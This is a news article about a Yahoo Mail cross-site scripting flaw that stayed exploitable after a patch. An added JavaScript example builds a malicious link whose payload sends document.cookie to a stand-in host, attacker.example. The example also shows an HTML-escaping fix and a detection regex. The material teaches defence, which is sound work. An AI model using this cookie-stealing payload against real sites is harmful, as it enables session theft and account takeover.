Yahoo Mail XSS Vulnerability Still Exploitable After Patch

The patch that didn’t patch up much

Yahoo Mail is still affected by an XSS vulnerability, despite the troubled Internet giant pushing out what it believed was a fix earlier this month.

On 7 January, Yahoo issued a fix for the flaw, which allowed an attacker to take complete control of a victim’s Yahoo Mail account by carrying out a cross-site scripting (XSS) attack. But researchers subsequently found a way to exploit the flaw, even after the patch.

XSS flaws arise where a website takes untrusted data and renders it into a page without encoding it. If that data contains JavaScript, the browser runs it with the site’s own origin, so the script can read the user’s cookies and send requests as the logged-in user.

Yahoo Mail insecurity

To compromise user accounts, attackers have to get their targets to click on a link crafted so that the vulnerable part of the site reflects attacker-supplied JavaScript back into the page. Once that script runs in the victim’s browser, it can read the session cookies and pass them to a server the attacker controls. Because the script runs with the site’s origin, marking cookies HttpOnly does not close the hole on its own: the script can still act as the logged-in user without ever reading the cookie value.
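The reflected-XSS pattern described above, as an added example that is not code from the original article and not the actual Yahoo Mail flaw (the article does not describe the vulnerable parameter). The endpoint `https://mail.example/search`, the query parameter `q` and the attacker host `https://attacker.example` are hypothetical; the vulnerable renderer reflects the parameter straight into HTML, while the hardened one HTML-encodes it first:

```javascript
// Added example of reflected XSS via a crafted link. All names are hypothetical:
// "mail.example", the "q" parameter and "attacker.example" are constructed here.
const ATTACKER_COLLECTOR = "https://attacker.example/collect"; // hypothetical

// The script the victim's browser would run if the page reflects it unencoded:
// it reads document.cookie and ships it to the attacker via an image request.
const PAYLOAD =
  `<img src=x onerror="(new Image).src='${ATTACKER_COLLECTOR}?c='+encodeURIComponent(document.cookie)">`;

// The link the victim is lured into clicking; the payload rides in a query parameter.
function buildMaliciousLink(base) {
  const u = new URL(base);
  u.searchParams.set("q", PAYLOAD);
  return u.toString();
}

// Vulnerable server-side rendering: the untrusted parameter is interpolated as-is.
function renderVulnerable(link) {
  const q = new URL(link).searchParams.get("q") ?? "";
  return `<h2>Results for: ${q}</h2>`;
}

// Hardened rendering: HTML-encode before placing untrusted text in element content.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderHardened(link) {
  const q = new URL(link).searchParams.get("q") ?? "";
  return `<h2>Results for: ${escapeHtml(q)}</h2>`;
}

// Rough reviewer check: does the rendered markup still contain a tag with an
// inline event handler, or a script tag, that came from the untrusted input?
function containsActiveScript(html) {
  return /<[^>]+\son\w+\s*=/i.test(html) || /<script\b/i.test(html);
}

const link = buildMaliciousLink("https://mail.example/search");
console.log("vulnerable:", renderVulnerable(link));
console.log("hardened:  ", renderHardened(link));
```

The hardened version only addresses untrusted text placed in element content; data written into attributes, URLs or script blocks needs the encoding appropriate to that context, which is why generic browser-side XSS filters are a weak last line of defence.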

The vulnerability has come as a setback for Yahoo, which had only launched its revamped Mail client in mid-December.

“With little modification to the original proof of concept code written by Abysssec, it is still possible to exploit the original Yahoo vulnerability, allowing an attacker to completely take over a victim’s account,” wrote researchers on the Offensive Security blog.

“The victim has to be lured to click a link which contains malicious XSS code for the attack to succeed.

“Yahoo Mail users should be on guard against clicking any links for the foreseeable future. Due to the nature of the vulnerability, XSS filters and similar protections provide little defense against this attack.”

The team also published a video demonstrating how the XSS vulnerability could be exploited.

Microsoft saw one of its fixes picked apart by researchers this month, when Exodus Intelligence showed that a flaw in Internet Explorer could still be exploited after the patch, leaving users open to attack.

UPDATE: Yahoo got in touch to say it has now fixed the flaw properly: “The cross-site scripting vulnerability that we identified on Friday was fixed the same day. We can confirm that we’ve now fixed the vulnerability on all versions of the site.”
